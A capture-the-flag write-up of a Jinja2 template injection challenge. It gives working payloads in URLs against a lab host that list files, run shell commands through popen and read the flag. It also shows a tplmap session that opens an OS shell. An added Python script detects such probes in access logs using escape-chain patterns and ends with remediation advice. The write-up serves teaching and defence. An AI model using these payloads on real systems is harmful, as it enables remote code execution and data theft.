Problem description
Source: XTCTF
Solution
Manual injection
Opening the page, the hint says it is a Python template injection:
We can test this:
http://111.200.241.244:58124/{{2+3}}
The backend evaluated {{2 + 3}} and placed the result in the response. We then use a payload to list the directory (any one of the following works):
http://111.200.241.244:58124/{{().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')}}
http://111.200.241.244:58124/{{{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('commands').getstatusoutput('ls')}}
http://111.200.241.244:58124/{{{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('ls').read()}}
http://111.200.241.244:58124/{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
Read the file:
http://111.200.241.244:58124/{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}}
Tplmap automated injection
Enter the following command:
┌──(cheery㉿kali)-[~/Desktop/Tools/tplmap]
└─$ py tplmap.py -u "http://111.200.241.244:58124/*" --os-shell
Tplmap 0.5
Automatic Server-Side Template Injection Detection and Exploitation Tool
Testing if URL parameter 'url' is injectable
Smarty plugin is testing rendering with tag '*'
Smarty plugin is testing blind injection
Mako plugin is testing rendering with tag '${*}'
Mako plugin is testing blind injection
Python plugin is testing rendering with tag 'str(*)'
Python plugin is testing blind injection
Tornado plugin is testing rendering with tag '{{*}}'
Tornado plugin is testing blind injection
Jinja2 plugin is testing rendering with tag '{{*}}'
Jinja2 plugin has confirmed injection with tag '{{*}}'
Tplmap identified the following injection point:
URL parameter: url
Engine: Jinja2
Injection: {{*}}
Context: text
OS: posix-linux2
Technique: render
Capabilities:
Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code
Run commands on the operating system.
posix-linux2 $ ls
fl4g
index.py
posix-linux2 $ cat fl4g
ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}
posix-linux2 $
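From the defender's side, both halves of this writeup leave a clear trace in the web server's access log: first a render-confirmation probe such as {{2+3}}, then attribute-traversal chains reaching os, popen or open, and in the tplmap run a single client cycling through the delimiters of several engines (*, ${*}, str(*), {{*}}) within seconds. The following script is an added example, not part of the original writeup or of tplmap; it parses combined-format access-log lines (the log lines are constructed here, modelled on the requests above), classifies each request path by template delimiter style and by the tokens it contains, and flags clients that probe three or more delimiter styles as likely automated scanners. The log format, the token list and the threshold of three styles are assumptions; tune them to your environment. It uses only the standard library.

```python
"""Detect server-side template injection (SSTI) probes in web access logs.

Added example (not from the original writeup). It recognises the three
stages shown in the writeup: the render-confirmation probe ({{2+3}}), the
object-traversal chains used to reach os/popen/open, and an automated
scanner cycling through several engines' delimiters from one client.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import unquote

# Combined-format request line: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

# Expression delimiters of common engines. Order matters: "${...}" and "{{...}}"
# are tested before the single-brace style so a Mako or Jinja2 probe is not also
# counted as Smarty. Single-brace and str(...) are only flagged when the body
# contains an arithmetic operator, so REST-style paths like /items/{id} pass.
TAG_STYLES = [
    ("mako ${...}", re.compile(r"\$\{([^{}]*)\}")),
    ("jinja2/tornado {{...}}", re.compile(r"\{\{(.*?)\}\}", re.S)),
    ("jinja2 {%...%}", re.compile(r"\{%(.*?)%\}", re.S)),
    ("smarty {...}", re.compile(r"(?<![{$])\{([^{}]*[*+\-/][^{}]*)\}(?!\})")),
    ("python str(...)", re.compile(r"\bstr\(([^()]*[*+\-/][^()]*)\)")),
]

# A bare arithmetic expression is the classic "does the server evaluate this?" probe.
ARITH_RE = re.compile(r"^\s*\d+\s*[*+\-/]\s*\d+\s*$")

# Attribute-traversal and OS-access tokens that appear in sandbox-escape chains
# (assumed list; extend it with what your own application never uses legitimately).
ESCAPE_TOKENS = re.compile(
    r"__(?:class|base|bases|mro|subclasses|globals|builtins|import|init)__"
    r"|\bpopen\b|\blistdir\b|\bgetstatusoutput\b|\bsubprocess\b|\bopen\(|\.read\(\)"
)


@dataclass
class Finding:
    ip: str
    path: str       # URL-decoded request path
    style: str      # which engine's delimiter matched
    kind: str       # "render-probe", "escape-chain" or "template-expression"
    severity: str   # "medium", "high" or "low"
    tokens: tuple   # escape-chain tokens found in the expression body


def classify_path(path):
    """Return (style, kind, severity, tokens) for every template expression in a decoded path."""
    results = []
    for style, rx in TAG_STYLES:
        for m in rx.finditer(path):
            body = m.group(1)
            tokens = tuple(sorted(set(ESCAPE_TOKENS.findall(body))))
            if tokens:
                results.append((style, "escape-chain", "high", tokens))
            elif ARITH_RE.match(body):
                results.append((style, "render-probe", "medium", ()))
            else:
                results.append((style, "template-expression", "low", ()))
    return results


def scan_log(text):
    """Parse access-log lines; return the findings and the delimiter styles seen per client."""
    findings = []
    styles_by_ip = defaultdict(set)
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = unquote(m["path"])  # clients often percent-encode braces and quotes
        for style, kind, severity, tokens in classify_path(path):
            findings.append(Finding(m["ip"], path, style, kind, severity, tokens))
            styles_by_ip[m["ip"]].add(style)
    return findings, styles_by_ip


def scanner_clients(styles_by_ip, min_styles=3):
    """Clients probing several engines' delimiters look like an automated tool such as tplmap."""
    return sorted(ip for ip, styles in styles_by_ip.items() if len(styles) >= min_styles)


# Constructed sample log (not real traffic): 10.0.0.5 mirrors the manual probes in
# the writeup, 10.0.0.9 a scanner cycling through engines, 10.0.0.2 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /{{2+3}} HTTP/1.1" 200 5
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /%7B%7B().__class__.__base__.__subclasses__()[71].__init__.__globals__['os'].listdir('.')%7D%7D HTTP/1.1" 200 40
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /{{[].__class__.__base__.__subclasses__()[40]('fl4g').read()}} HTTP/1.1" 200 44
10.0.0.9 - - [01/Jan/2024:11:00:00 +0000] "GET /{7*7} HTTP/1.1" 200 9
10.0.0.9 - - [01/Jan/2024:11:00:01 +0000] "GET /${7*7} HTTP/1.1" 200 10
10.0.0.9 - - [01/Jan/2024:11:00:02 +0000] "GET /str(7*7) HTTP/1.1" 200 12
10.0.0.9 - - [01/Jan/2024:11:00:03 +0000] "GET /{{7*7}} HTTP/1.1" 200 8
10.0.0.9 - - [01/Jan/2024:11:00:04 +0000] "GET /{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}} HTTP/1.1" 200 60
10.0.0.2 - - [01/Jan/2024:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 1200
10.0.0.2 - - [01/Jan/2024:12:00:05 +0000] "GET /api/items/{id} HTTP/1.1" 404 17
"""

if __name__ == "__main__":
    findings, styles = scan_log(SAMPLE_LOG)
    for f in findings:
        print(f"{f.severity:6} {f.ip:10} {f.style:24} {f.kind:14} {' '.join(f.tokens)}")
    print("likely automated scanners:", scanner_clients(styles))
```

Running it on the sample reports five medium render probes, three high escape chains and 10.0.0.9 as an automated scanner; the two benign requests, including the REST-style path containing single braces, produce no finding. Detection is only the second line of defence: the root cause in this challenge is that the request path is rendered as template source, so any expression in it is evaluated. Rendering user data through the template context instead (a fixed template containing {{ name }}, with the value passed in as data) removes the evaluation entirely, and a sandboxed template environment limits what an expression can reach if a render-from-string path does slip through.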